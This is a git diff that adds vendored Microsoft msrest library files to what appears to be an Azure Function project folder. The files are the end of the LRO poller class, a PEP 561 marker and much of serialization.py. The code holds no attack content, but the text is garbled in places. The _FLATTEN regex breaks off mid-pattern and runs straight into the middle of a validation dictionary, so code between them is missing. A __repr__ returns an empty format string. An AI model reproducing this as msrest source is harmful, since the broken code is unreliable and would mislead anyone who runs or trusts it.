ServiceClient + except AttributeError: + raise ValueError("Poller client parameter must be a low-level msrest Service Client or a SDK client.") + self._response = initial_response.response if isinstance(initial_response, ClientRawResponse) else initial_response + self._callbacks = [] # type: List[Callable] + self._polling_method = polling_method + + if isinstance(deserialization_callback, type) and issubclass(deserialization_callback, Model): + deserialization_callback = deserialization_callback.deserialize # type: ignore + + # Might raise a CloudError + self._polling_method.initialize(self._client, self._response, deserialization_callback) + + # Prepare thread execution + self._thread = None + self._done = None + self._exception = None + if not self._polling_method.finished(): + self._done = threading.Event() + self._thread = threading.Thread( + target=self._start, + name="LROPoller({})".format(uuid.uuid4())) + self._thread.daemon = True + self._thread.start() + + def _start(self): + """Start the long running operation. + On completion, runs any callbacks. + + :param callable update_cmd: The API request to check the status of + the operation. + """ + try: + self._polling_method.run() + except Exception as err: + self._exception = err + + finally: + self._done.set() + + callbacks, self._callbacks = self._callbacks, [] + while callbacks: + for call in callbacks: + call(self._polling_method) + callbacks, self._callbacks = self._callbacks, [] + + def status(self): + # type: () -> str + """Returns the current status string. + + :returns: The current status string + :rtype: str + """ + return self._polling_method.status() + + def result(self, timeout=None): + # type: (Optional[float]) -> Model + """Return the result of the long running operation, or + the result available after the specified timeout. + + :returns: The deserialized resource of the long running operation, + if one is available. + :raises CloudError: Server problem with the query. + """ + self.wait(timeout) + return self._polling_method.resource() + + def wait(self, timeout=None): + # type: (Optional[float]) -> None + """Wait on the long running operation for a specified length + of time. You can check if this call as ended with timeout with the + "done()" method. + + :param float timeout: Period of time to wait for the long running + operation to complete (in seconds). + :raises CloudError: Server problem with the query. + """ + if self._thread is None: + return + self._thread.join(timeout=timeout) + try: + # Let's handle possible None in forgiveness here + raise self._exception # type: ignore + except TypeError: # Was None + pass + + def done(self): + # type: () -> bool + """Check status of the long running operation. + + :returns: 'True' if the process has completed, else 'False'. + """ + return self._thread is None or not self._thread.is_alive() + + def add_done_callback(self, func): + # type: (Callable) -> None + """Add callback function to be run once the long running operation + has completed - regardless of the status of the operation. + + :param callable func: Callback function that takes at least one + argument, a completed LongRunningOperation. + """ + # Still use "_done" and not "done", since CBs are executed inside the thread. + if self._done is None or self._done.is_set(): + func(self._polling_method) + # Let's add them still, for consistency (if you wish to access to it for some reasons) + self._callbacks.append(func) + + def remove_done_callback(self, func): + # type: (Callable) -> None + """Remove a callback from the long running operation. + + :param callable func: The function to be removed from the callbacks. + :raises: ValueError if the long running operation has already + completed. + """ + if self._done is None or self._done.is_set(): + raise ValueError("Process is complete.") + self._callbacks = [c for c in self._callbacks if c != func] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/py.typed b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/py.typed new file mode 100644 index 0000000..e5aff4f --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/py.typed @@ -0,0 +1 @@ +# Marker file for PEP 561. \ No newline at end of file diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/serialization.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/serialization.py new file mode 100644 index 0000000..11d4b6d --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/serialization.py @@ -0,0 +1,1994 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- + +from base64 import b64decode, b64encode +import calendar +import datetime +import decimal +import email +from enum import Enum +import json +import logging +import re +import sys +try: + from urllib import quote # type: ignore +except ImportError: + from urllib.parse import quote # type: ignore +import xml.etree.ElementTree as ET + +import isodate + +from typing import Dict, Any + +from .exceptions import ( + ValidationError, + SerializationError, + DeserializationError, + raise_with_traceback) + +try: + basestring # type: ignore + unicode_str = unicode # type: ignore +except NameError: + basestring = str # type: ignore + unicode_str = str # type: ignore + +_LOGGER = logging.getLogger(__name__) + +try: + _long_type = long # type: ignore +except NameError: + _long_type = int + +class UTC(datetime.tzinfo): + """Time Zone info for handling UTC""" + + def utcoffset(self, dt): + """UTF offset for UTC is 0.""" + return datetime.timedelta(0) + + def tzname(self, dt): + """Timestamp representation.""" + return "Z" + + def dst(self, dt): + """No daylight saving for UTC.""" + return datetime.timedelta(hours=1) + +try: + from datetime import timezone as _FixedOffset +except ImportError: # Python 2.7 + class _FixedOffset(datetime.tzinfo): # type: ignore + """Fixed offset in minutes east from UTC. + Copy/pasted from Python doc + :param datetime.timedelta offset: offset in timedelta format + """ + + def __init__(self, offset): + self.__offset = offset + + def utcoffset(self, dt): + return self.__offset + + def tzname(self, dt): + return str(self.__offset.total_seconds()/3600) + + def __repr__(self): + return "".format(self.tzname(None)) + + def dst(self, dt): + return datetime.timedelta(0) + + def __getinitargs__(self): + return (self.__offset,) + +try: + from datetime import timezone + TZ_UTC = timezone.utc # type: ignore +except ImportError: + TZ_UTC = UTC() # type: ignore + +_FLATTEN = re.compile(r"(? y, + "minimum": lambda x, y: x < y, + "maximum": lambda x, y: x > y, + "minimum_ex": lambda x, y: x <= y, + "maximum_ex": lambda x, y: x >= y, + "min_items": lambda x, y: len(x) < y, + "max_items": lambda x, y: len(x) > y, + "pattern": lambda x, y: not re.match(y, x, re.UNICODE), + "unique": lambda x, y: len(x) != len(set(x)), + "multiple": lambda x, y: x % y != 0 + } + + def __init__(self, classes=None): + self.serialize_type = { + 'iso-8601': Serializer.serialize_iso, + 'rfc-1123': Serializer.serialize_rfc, + 'unix-time': Serializer.serialize_unix, + 'duration': Serializer.serialize_duration, + 'date': Serializer.serialize_date, + 'time': Serializer.serialize_time, + 'decimal': Serializer.serialize_decimal, + 'long': Serializer.serialize_long, + 'bytearray': Serializer.serialize_bytearray, + 'base64': Serializer.serialize_base64, + 'object': self.serialize_object, + '[]': self.serialize_iter, + '{}': self.serialize_dict + } + self.dependencies = dict(classes) if classes else {} + self.key_transformer = full_restapi_key_transformer + self.client_side_validation = True + + def _serialize(self, target_obj, data_type=None, **kwargs): + """Serialize data into a string according to type. + + :param target_obj: The data to be serialized. + :param str data_type: The type to be serialized from. + :rtype: str, dict + :raises: SerializationError if serialization fails. + """ + key_transformer = kwargs.get("key_transformer", self.key_transformer) + keep_readonly = kwargs.get("keep_readonly", False) + if target_obj is None: + return None + + attr_name = None + class_name = target_obj.__class__.__name__ + + if data_type: + return self.serialize_data( + target_obj, data_type, **kwargs) + + if not hasattr(target_obj, "_attribute_map"): + data_type = type(target_obj).__name__ + if data_type in self.basic_types.values(): + return self.serialize_data( + target_obj, data_type, **kwargs) + + # Force "is_xml" kwargs if we detect a XML model + try: + is_xml_model_serialization = kwargs["is_xml"] + except KeyError: + is_xml_model_serialization = kwargs.setdefault("is_xml", target_obj.is_xml_model()) + + serialized = {} + if is_xml_model_serialization: + serialized = target_obj._create_xml_node() + try: + attributes = target_obj._attribute_map + for attr, attr_desc in attributes.items(): + attr_name = attr + if not keep_readonly and target_obj._validation.get(attr_name, {}).get('readonly', False): + continue + + if attr_name == "additional_properties" and attr_desc["key"] == '': + if target_obj.additional_properties is not None: + serialized.update(target_obj.additional_properties) + continue + try: + ### Extract sub-data to serialize from model ### + orig_attr = getattr(target_obj, attr) + if is_xml_model_serialization: + pass # Don't provide "transformer" for XML for now. Keep "orig_attr" + else: # JSON + keys, orig_attr = key_transformer(attr, attr_desc.copy(), orig_attr) + keys = keys if isinstance(keys, list) else [keys] + + ### Serialize this data ### + kwargs["serialization_ctxt"] = attr_desc + new_attr = self.serialize_data(orig_attr, attr_desc['type'], **kwargs) + + ### Incorporate this data in the right place ### + if is_xml_model_serialization: + xml_desc = attr_desc.get('xml', {}) + xml_name = xml_desc.get('name', attr_desc['key']) + xml_prefix = xml_desc.get('prefix', None) + xml_ns = xml_desc.get('ns', None) + if xml_desc.get("attr", False): + if xml_ns: + ET.register_namespace(xml_prefix, xml_ns) + xml_name = "{{{}}}{}".format(xml_ns, xml_name) + serialized.set(xml_name, new_attr) + continue + if xml_desc.get("text", False): + serialized.text = new_attr + continue + if isinstance(new_attr, list): + serialized.extend(new_attr) + elif isinstance(new_attr, ET.Element): + # If the down XML has no XML/Name, we MUST replace the tag with the local tag. But keeping the namespaces. + if 'name' not in getattr(orig_attr, '_xml_map', {}): + splitted_tag = new_attr.tag.split("}") + if len(splitted_tag) == 2: # Namespace + new_attr.tag = "}".join([splitted_tag[0], xml_name]) + else: + new_attr.tag = xml_name + serialized.append(new_attr) + else: # That's a basic type + # Integrate namespace if necessary + local_node = _create_xml_node( + xml_name, + xml_prefix, + xml_ns + ) + local_node.text = unicode_str(new_attr) + serialized.append(local_node) + else: # JSON + for k in reversed(keys): + unflattened = {k: new_attr} + new_attr = unflattened + + _new_attr = new_attr + _serialized = serialized + for k in keys: + if k not in _serialized: + _serialized.update(_new_attr) + _new_attr = _new_attr[k] + _serialized = _serialized[k] + except ValueError as err: + if isinstance(err, SerializationError): + raise err + continue + + except (AttributeError, KeyError, TypeError) as err: + msg = "Attribute {} in object {} cannot be serialized.\n{}".format( + attr_name, class_name, str(target_obj)) + raise_with_traceback(SerializationError, msg, err) + else: + return serialized + + def body(self, data, data_type, **kwargs): + """Serialize data intended for a request body. + + :param data: The data to be serialized. + :param str data_type: The type to be serialized from. + :rtype: dict + :raises: SerializationError if serialization fails. + :raises: ValueError if data is None + """ + if data is None: + raise ValidationError("required", "body", True) + + # Just in case this is a dict + internal_data_type = data_type.strip('[]{}') + internal_data_type = self.dependencies.get(internal_data_type, None) + try: + is_xml_model_serialization = kwargs["is_xml"] + except KeyError: + if internal_data_type and issubclass(internal_data_type, Model): + is_xml_model_serialization = kwargs.setdefault("is_xml", internal_data_type.is_xml_model()) + else: + is_xml_model_serialization = False + if internal_data_type and not isinstance(internal_data_type, Enum): + try: + deserializer = Deserializer(self.dependencies) + # Since it's on serialization, it's almost sure that format is not JSON REST + # We're not able to deal with additional properties for now. + deserializer.additional_properties_detection = False + if is_xml_model_serialization: + deserializer.key_extractors = [ + attribute_key_case_insensitive_extractor, + ] + else: + deserializer.key_extractors = [ + rest_key_case_insensitive_extractor, + attribute_key_case_insensitive_extractor, + last_rest_key_case_insensitive_extractor + ] + data = deserializer._deserialize(data_type, data) + except DeserializationError as err: + raise_with_traceback( + SerializationError, "Unable to build a model: "+str(err), err) + + if self.client_side_validation: + errors = _recursive_validate(data_type, data_type, data) + if errors: + raise errors[0] + return self._serialize(data, data_type, **kwargs) + + def _http_component_validation(self, data, data_type, name, **kwargs): + if self.client_side_validation: + # https://github.com/Azure/msrest-for-python/issues/85 + if data is not None and data_type in self.basic_types.values(): + data = self.serialize_basic(data, data_type, **kwargs) + data = self.validate(data, name, required=True, **kwargs) + return data + + def url(self, name, data, data_type, **kwargs): + """Serialize data intended for a URL path. + + :param data: The data to be serialized. + :param str data_type: The type to be serialized from. + :rtype: str + :raises: TypeError if serialization fails. + :raises: ValueError if data is None + """ + data = self._http_component_validation(data, data_type, name, **kwargs) + try: + output = self.serialize_data(data, data_type, **kwargs) + if data_type == 'bool': + output = json.dumps(output) + + if kwargs.get('skip_quote') is True: + output = str(output) + else: + output = quote(str(output), safe='') + except SerializationError: + raise TypeError("{} must be type {}.".format(name, data_type)) + else: + return output + + def query(self, name, data, data_type, **kwargs): + """Serialize data intended for a URL query. + + :param data: The data to be serialized. + :param str data_type: The type to be serialized from. + :rtype: str + :raises: TypeError if serialization fails. + :raises: ValueError if data is None + """ + data = self._http_component_validation(data, data_type, name, **kwargs) + try: + # Treat the list aside, since we don't want to encode the div separator + if data_type.startswith("["): + internal_data_type = data_type[1:-1] + data = [ + self.serialize_data(d, internal_data_type, **kwargs) if d is not None else "" + for d + in data + ] + if not kwargs.get('skip_quote', False): + data = [ + quote(str(d), safe='') + for d + in data + ] + return str(self.serialize_iter(data, internal_data_type, **kwargs)) + + # Not a list, regular serialization + output = self.serialize_data(data, data_type, **kwargs) + if data_type == 'bool': + output = json.dumps(output) + if kwargs.get('skip_quote') is True: + output = str(output) + else: + output = quote(str(output), safe='') + except SerializationError: + raise TypeError("{} must be type {}.".format(name, data_type)) + else: + return str(output) + + def header(self, name, data, data_type, **kwargs): + """Serialize data intended for a request header. + + :param data: The data to be serialized. + :param str data_type: The type to be serialized from. + :rtype: str + :raises: TypeError if serialization fails. + :raises: ValueError if data is None + """ + data = self._http_component_validation(data, data_type, name, **kwargs) + try: + if data_type in ['[str]']: + data = ["" if d is None else d for d in data] + + output = self.serialize_data(data, data_type, **kwargs) + if data_type == 'bool': + output = json.dumps(output) + except SerializationError: + raise TypeError("{} must be type {}.".format(name, data_type)) + else: + return str(output) + + @classmethod + def validate(cls, data, name, **kwargs): + """Validate that a piece of data meets certain conditions""" + required = kwargs.get('required', False) + if required and data is None: + raise ValidationError("required", name, True) + elif data is None: + return + elif kwargs.get('readonly'): + return + + try: + for key, value in kwargs.items(): + validator = cls.validation.get(key, lambda x, y: False) + if validator(data, value): + raise ValidationError(key, name, value) + except TypeError: + raise ValidationError("unknown", name, "unknown") + else: + return data + + def serialize_data(self, data, data_type, **kwargs): + """Serialize generic data according to supplied data type. + + :param data: The data to be serialized. + :param str data_type: The type to be serialized from. + :param bool required: Whether it's essential that the data not be + empty or None + :raises: AttributeError if required data is None. + :raises: ValueError if data is None + :raises: SerializationError if serialization fails. + """ + if data is None: + raise ValueError("No value for given attribute") + + try: + if data_type in self.basic_types.values(): + return self.serialize_basic(data, data_type, **kwargs) + + elif data_type in self.serialize_type: + return self.serialize_type[data_type](data, **kwargs) + + # If dependencies is empty, try with current data class + # It has to be a subclass of Enum anyway + enum_type = self.dependencies.get(data_type, data.__class__) + if issubclass(enum_type, Enum): + return Serializer.serialize_enum(data, enum_obj=enum_type) + + iter_type = data_type[0] + data_type[-1] + if iter_type in self.serialize_type: + return self.serialize_type[iter_type]( + data, data_type[1:-1], **kwargs) + + except (ValueError, TypeError) as err: + if (isinstance(err, SerializationError)): + raise err # don't rewrap as SerializationError + msg = "Unable to serialize value: {!r} as type: {!r}." + raise_with_traceback( + SerializationError, msg.format(data, data_type), err) + else: + return self._serialize(data, **kwargs) + + @classmethod + def _get_custom_serializers(cls, data_type, **kwargs): + custom_serializer = kwargs.get("basic_types_serializers", {}).get(data_type) + if custom_serializer: + return custom_serializer + if kwargs.get("is_xml", False): + return cls._xml_basic_types_serializers.get(data_type) + + @classmethod + def serialize_basic(cls, data, data_type, **kwargs): + """Serialize basic builting data type. + Serializes objects to str, int, float or bool. + + Possible kwargs: + - basic_types_serializers dict[str, callable] : If set, use the callable as serializer + - is_xml bool : If set, use xml_basic_types_serializers + + :param data: Object to be serialized. + :param str data_type: Type of object in the iterable. + """ + custom_serializer = cls._get_custom_serializers(data_type, **kwargs) + if custom_serializer: + return custom_serializer(data) + if data_type == 'str': + return cls.serialize_unicode(data) + return eval(data_type)(data) + + @classmethod + def serialize_unicode(cls, data): + """Special handling for serializing unicode strings in Py2. + Encode to UTF-8 if unicode, otherwise handle as a str. + + :param data: Object to be serialized. + :rtype: str + """ + try: # If I received an enum, return its value + return data.value + except AttributeError: + pass + + try: + if isinstance(data, unicode): + # Don't change it, JSON and XML ElementTree are totally able + # to serialize correctly u'' strings + return data + except NameError: + return str(data) + else: + return str(data) + + def serialize_iter(self, data, iter_type, div=None, **kwargs): + """Serialize iterable. + + Supported kwargs: + - serialization_ctxt dict : The current entry of _attribute_map, or same format. + serialization_ctxt['type'] should be same as data_type. + - is_xml bool : If set, serialize as XML + + :param list attr: Object to be serialized. + :param str iter_type: Type of object in the iterable. + :param bool required: Whether the objects in the iterable must + not be None or empty. + :param str div: If set, this str will be used to combine the elements + in the iterable into a combined string. Default is 'None'. + :rtype: list, str + """ + if isinstance(data, str): + raise SerializationError("Refuse str type as a valid iter type.") + + serialization_ctxt = kwargs.get("serialization_ctxt", {}) + is_xml = kwargs.get("is_xml", False) + + serialized = [] + for d in data: + try: + serialized.append(self.serialize_data(d, iter_type, **kwargs)) + except ValueError as err: + if isinstance(err, SerializationError): + raise err + serialized.append(None) + + if div: + serialized = ['' if s is None else str(s) for s in serialized] + serialized = div.join(serialized) + + if 'xml' in serialization_ctxt or is_xml: + # XML serialization is more complicated + xml_desc = serialization_ctxt.get('xml', {}) + xml_name = xml_desc.get('name') + if not xml_name: + xml_name = serialization_ctxt['key'] + + # Create a wrap node if necessary (use the fact that Element and list have "append") + is_wrapped = xml_desc.get("wrapped", False) + node_name = xml_desc.get("itemsName", xml_name) + if is_wrapped: + final_result = _create_xml_node( + xml_name, + xml_desc.get('prefix', None), + xml_desc.get('ns', None) + ) + else: + final_result = [] + # All list elements to "local_node" + for el in serialized: + if isinstance(el, ET.Element): + el_node = el + else: + el_node = _create_xml_node( + node_name, + xml_desc.get('prefix', None), + xml_desc.get('ns', None) + ) + if el is not None: # Otherwise it writes "None" :-p + el_node.text = str(el) + final_result.append(el_node) + return final_result + return serialized + + def serialize_dict(self, attr, dict_type, **kwargs): + """Serialize a dictionary of objects. + + :param dict attr: Object to be serialized. + :param str dict_type: Type of object in the dictionary. + :param bool required: Whether the objects in the dictionary must + not be None or empty. + :rtype: dict + """ + serialization_ctxt = kwargs.get("serialization_ctxt", {}) + serialized = {} + for key, value in attr.items(): + try: + serialized[self.serialize_unicode(key)] = self.serialize_data( + value, dict_type, **kwargs) + except ValueError as err: + if isinstance(err, SerializationError): + raise err + serialized[self.serialize_unicode(key)] = None + + if 'xml' in serialization_ctxt: + # XML serialization is more complicated + xml_desc = serialization_ctxt['xml'] + xml_name = xml_desc['name'] + + final_result = _create_xml_node( + xml_name, + xml_desc.get('prefix', None), + xml_desc.get('ns', None) + ) + for key, value in serialized.items(): + ET.SubElement(final_result, key).text = value + return final_result + + return serialized + + def serialize_object(self, attr, **kwargs): + """Serialize a generic object. + This will be handled as a dictionary. If object passed in is not + a basic type (str, int, float, dict, list) it will simply be + cast to str. + + :param dict attr: Object to be serialized. + :rtype: dict or str + """ + if attr is None: + return None + if isinstance(attr, ET.Element): + return attr + obj_type = type(attr) + if obj_type in self.basic_types: + return self.serialize_basic(attr, self.basic_types[obj_type], **kwargs) + if obj_type is _long_type: + return self.serialize_long(attr) + if obj_type is unicode_str: + return self.serialize_unicode(attr) + if obj_type is datetime.datetime: + return self.serialize_iso(attr) + if obj_type is datetime.date: + return self.serialize_date(attr) + if obj_type is datetime.time: + return self.serialize_time(attr) + if obj_type is datetime.timedelta: + return self.serialize_duration(attr) + if obj_type is decimal.Decimal: + return self.serialize_decimal(attr) + + # If it's a model or I know this dependency, serialize as a Model + elif obj_type in self.dependencies.values() or isinstance(attr, Model): + return self._serialize(attr) + + if obj_type == dict: + serialized = {} + for key, value in attr.items(): + try: + serialized[self.serialize_unicode(key)] = self.serialize_object( + value, **kwargs) + except ValueError: + serialized[self.serialize_unicode(key)] = None + return serialized + + if obj_type == list: + serialized = [] + for obj in attr: + try: + serialized.append(self.serialize_object( + obj, **kwargs)) + except ValueError: + pass + return serialized + return str(attr) + + @staticmethod + def serialize_enum(attr, enum_obj=None): + try: + result = attr.value + except AttributeError: + result = attr + try: + enum_obj(result) + return result + except ValueError: + for enum_value in enum_obj: + if enum_value.value.lower() == str(attr).lower(): + return enum_value.value + error = "{!r} is not valid value for enum {!r}" + raise SerializationError(error.format(attr, enum_obj)) + + @staticmethod + def serialize_bytearray(attr, **kwargs): + """Serialize bytearray into base-64 string. + + :param attr: Object to be serialized. + :rtype: str + """ + return b64encode(attr).decode() + + @staticmethod + def serialize_base64(attr, **kwargs): + """Serialize str into base-64 string. + + :param attr: Object to be serialized. + :rtype: str + """ + encoded = b64encode(attr).decode('ascii') + return encoded.strip('=').replace('+', '-').replace('/', '_') + + @staticmethod + def serialize_decimal(attr, **kwargs): + """Serialize Decimal object to float. + + :param attr: Object to be serialized. + :rtype: float + """ + return float(attr) + + @staticmethod + def serialize_long(attr, **kwargs): + """Serialize long (Py2) or int (Py3). + + :param attr: Object to be serialized. + :rtype: int/long + """ + return _long_type(attr) + + @staticmethod + def serialize_date(attr, **kwargs): + """Serialize Date object into ISO-8601 formatted string. + + :param Date attr: Object to be serialized. + :rtype: str + """ + if isinstance(attr, str): + attr = isodate.parse_date(attr) + t = "{:04}-{:02}-{:02}".format(attr.year, attr.month, attr.day) + return t + + @staticmethod + def serialize_time(attr, **kwargs): + """Serialize Time object into ISO-8601 formatted string. + + :param datetime.time attr: Object to be serialized. + :rtype: str + """ + if isinstance(attr, str): + attr = isodate.parse_time(attr) + t = "{:02}:{:02}:{:02}".format(attr.hour, attr.minute, attr.second) + if attr.microsecond: + t += ".{:02}".format(attr.microsecond) + return t + + @staticmethod + def serialize_duration(attr, **kwargs): + """Serialize TimeDelta object into ISO-8601 formatted string. + + :param TimeDelta attr: Object to be serialized. + :rtype: str + """ + if isinstance(attr, str): + attr = isodate.parse_duration(attr) + return isodate.duration_isoformat(attr) + + @staticmethod + def serialize_rfc(attr, **kwargs): + """Serialize Datetime object into RFC-1123 formatted string. + + :param Datetime attr: Object to be serialized. + :rtype: str + :raises: TypeError if format invalid. + """ + try: + if not attr.tzinfo: + _LOGGER.warning( + "Datetime with no tzinfo will be considered UTC.") + utc = attr.utctimetuple() + except AttributeError: + raise TypeError("RFC1123 object must be valid Datetime object.") + + return "{}, {:02} {} {:04} {:02}:{:02}:{:02} GMT".format( + Serializer.days[utc.tm_wday], utc.tm_mday, + Serializer.months[utc.tm_mon], utc.tm_year, + utc.tm_hour, utc.tm_min, utc.tm_sec) + + @staticmethod + def serialize_iso(attr, **kwargs): + """Serialize Datetime object into ISO-8601 formatted string. + + :param Datetime attr: Object to be serialized. + :rtype: str + :raises: SerializationError if format invalid. + """ + if isinstance(attr, str): + attr = isodate.parse_datetime(attr) + try: + if not attr.tzinfo: + _LOGGER.warning( + "Datetime with no tzinfo will be considered UTC.") + utc = attr.utctimetuple() + if utc.tm_year > 9999 or utc.tm_year < 1: + raise OverflowError("Hit max or min date") + + microseconds = str(attr.microsecond).rjust(6,'0').rstrip('0').ljust(3, '0') + if microseconds: + microseconds = '.'+microseconds + date = "{:04}-{:02}-{:02}T{:02}:{:02}:{:02}".format( + utc.tm_year, utc.tm_mon, utc.tm_mday, + utc.tm_hour, utc.tm_min, utc.tm_sec) + return date + microseconds + 'Z' + except (ValueError, OverflowError) as err: + msg = "Unable to serialize datetime object." + raise_with_traceback(SerializationError, msg, err) + except AttributeError as err: + msg = "ISO-8601 object must be valid Datetime object." + raise_with_traceback(TypeError, msg, err) + + @staticmethod + def serialize_unix(attr, **kwargs): + """Serialize Datetime object into IntTime format. + This is represented as seconds. + + :param Datetime attr: Object to be serialized. + :rtype: int + :raises: SerializationError if format invalid + """ + if isinstance(attr, int): + return attr + try: + if not attr.tzinfo: + _LOGGER.warning( + "Datetime with no tzinfo will be considered UTC.") + return int(calendar.timegm(attr.utctimetuple())) + except AttributeError: + raise TypeError("Unix time object must be valid Datetime object.") + +def rest_key_extractor(attr, attr_desc, data): + key = attr_desc['key'] + working_data = data + + while '.' in key: + dict_keys = _FLATTEN.split(key) + if len(dict_keys) == 1: + key = _decode_attribute_map_key(dict_keys[0]) + break + working_key = _decode_attribute_map_key(dict_keys[0]) + working_data = working_data.get(working_key, data) + if working_data is None: + # If at any point while following flatten JSON path see None, it means + # that all properties under are None as well + # https://github.com/Azure/msrest-for-python/issues/197 + return None + key = '.'.join(dict_keys[1:]) + + return working_data.get(key) + +def rest_key_case_insensitive_extractor(attr, attr_desc, data): + key = attr_desc['key'] + working_data = data + + while '.' in key: + dict_keys = _FLATTEN.split(key) + if len(dict_keys) == 1: + key = _decode_attribute_map_key(dict_keys[0]) + break + working_key = _decode_attribute_map_key(dict_keys[0]) + working_data = attribute_key_case_insensitive_extractor(working_key, None, working_data) + if working_data is None: + # If at any point while following flatten JSON path see None, it means + # that all properties under are None as well + # https://github.com/Azure/msrest-for-python/issues/197 + return None + key = '.'.join(dict_keys[1:]) + + if working_data: + return attribute_key_case_insensitive_extractor(key, None, working_data) + +def last_rest_key_extractor(attr, attr_desc, data): + """Extract the attribute in "data" based on the last part of the JSON path key. + """ + key = attr_desc['key'] + dict_keys = _FLATTEN.split(key) + return attribute_key_extractor(dict_keys[-1], None, data) + +def last_rest_key_case_insensitive_extractor(attr, attr_desc, data): + """Extract the attribute in "data" based on the last part of the JSON path key. + + This is the case insensitive version of "last_rest_key_extractor" + """ + key = attr_desc['key'] + dict_keys = _FLATTEN.split(key) + return attribute_key_case_insensitive_extractor(dict_keys[-1], None, data) + +def attribute_key_extractor(attr, _, data): + return data.get(attr) + +def attribute_key_case_insensitive_extractor(attr, _, data): + found_key = None + lower_attr = attr.lower() + for key in data: + if lower_attr == key.lower(): + found_key = key + break + + return data.get(found_key) + +def _extract_name_from_internal_type(internal_type): + """Given an internal type XML description, extract correct XML name with namespace. + + :param dict internal_type: An model type + :rtype: tuple + :returns: A tuple XML name + namespace dict + """ + internal_type_xml_map = getattr(internal_type, "_xml_map", {}) + xml_name = internal_type_xml_map.get('name', internal_type.__name__) + xml_ns = internal_type_xml_map.get("ns", None) + if xml_ns: + xml_name = "{{{}}}{}".format(xml_ns, xml_name) + return xml_name + + +def xml_key_extractor(attr, attr_desc, data): + if isinstance(data, dict): + return None + + # Test if this model is XML ready first + if not isinstance(data, ET.Element): + return None + + xml_desc = attr_desc.get('xml', {}) + xml_name = xml_desc.get('name', attr_desc['key']) + + # Look for a children + is_iter_type = attr_desc['type'].startswith("[") + is_wrapped = xml_desc.get("wrapped", False) + internal_type = attr_desc.get("internalType", None) + internal_type_xml_map = getattr(internal_type, "_xml_map", {}) + + # Integrate namespace if necessary + xml_ns = xml_desc.get('ns', internal_type_xml_map.get("ns", None)) + if xml_ns: + xml_name = "{{{}}}{}".format(xml_ns, xml_name) + + # If it's an attribute, that's simple + if xml_desc.get("attr", False): + return data.get(xml_name) + + # If it's x-ms-text, that's simple too + if xml_desc.get("text", False): + return data.text + + # Scenario where I take the local name: + # - Wrapped node + # - Internal type is an enum (considered basic types) + # - Internal type has no XML/Name node + if is_wrapped or (internal_type and (issubclass(internal_type, Enum) or 'name' not in internal_type_xml_map)): + children = data.findall(xml_name) + # If internal type has a local name and it's not a list, I use that name + elif not is_iter_type and internal_type and 'name' in internal_type_xml_map: + xml_name = _extract_name_from_internal_type(internal_type) + children = data.findall(xml_name) + # That's an array + else: + if internal_type: # Complex type, ignore itemsName and use the complex type name + items_name = _extract_name_from_internal_type(internal_type) + else: + items_name = xml_desc.get("itemsName", xml_name) + children = data.findall(items_name) + + if len(children) == 0: + if is_iter_type: + if is_wrapped: + return None # is_wrapped no node, we want None + else: + return [] # not wrapped, assume empty list + return None # Assume it's not there, maybe an optional node. + + # If is_iter_type and not wrapped, return all found children + if is_iter_type: + if not is_wrapped: + return children + else: # Iter and wrapped, should have found one node only (the wrap one) + if len(children) != 1: + raise DeserializationError( + "Tried to deserialize an array not wrapped, and found several nodes '{}'. Maybe you should declare this array as wrapped?".format( + xml_name + )) + return list(children[0]) # Might be empty list and that's ok. + + # Here it's not a itertype, we should have found one element only or empty + if len(children) > 1: + raise DeserializationError("Find several XML '{}' where it was not expected".format(xml_name)) + return children[0] + +class Deserializer(object): + """Response object model deserializer. + + :param dict classes: Class type dictionary for deserializing complex types. + :ivar list key_extractors: Ordered list of extractors to be used by this deserializer. + """ + + basic_types = {str: 'str', int: 'int', bool: 'bool', float: 'float'} + + valid_date = re.compile( + r'\d{4}[-]\d{2}[-]\d{2}T\d{2}:\d{2}:\d{2}' + r'\.?\d*Z?[-+]?[\d{2}]?:?[\d{2}]?') + + def __init__(self, classes=None): + self.deserialize_type = { + 'iso-8601': Deserializer.deserialize_iso, + 'rfc-1123': Deserializer.deserialize_rfc, + 'unix-time': Deserializer.deserialize_unix, + 'duration': Deserializer.deserialize_duration, + 'date': Deserializer.deserialize_date, + 'time': Deserializer.deserialize_time, + 'decimal': Deserializer.deserialize_decimal, + 'long': Deserializer.deserialize_long, + 'bytearray': Deserializer.deserialize_bytearray, + 'base64': Deserializer.deserialize_base64, + 'object': self.deserialize_object, + '[]': self.deserialize_iter, + '{}': self.deserialize_dict + } + self.deserialize_expected_types = { + 'duration': (isodate.Duration, datetime.timedelta), + 'iso-8601': (datetime.datetime) + } + self.dependencies = dict(classes) if classes else {} + self.key_extractors = [ + rest_key_extractor, + xml_key_extractor + ] + # Additional properties only works if the "rest_key_extractor" is used to + # extract the keys. Making it to work whatever the key extractor is too much + # complicated, with no real scenario for now. + # So adding a flag to disable additional properties detection. This flag should be + # used if your expect the deserialization to NOT come from a JSON REST syntax. + # Otherwise, result are unexpected + self.additional_properties_detection = True + + def __call__(self, target_obj, response_data, content_type=None): + """Call the deserializer to process a REST response. + + :param str target_obj: Target data type 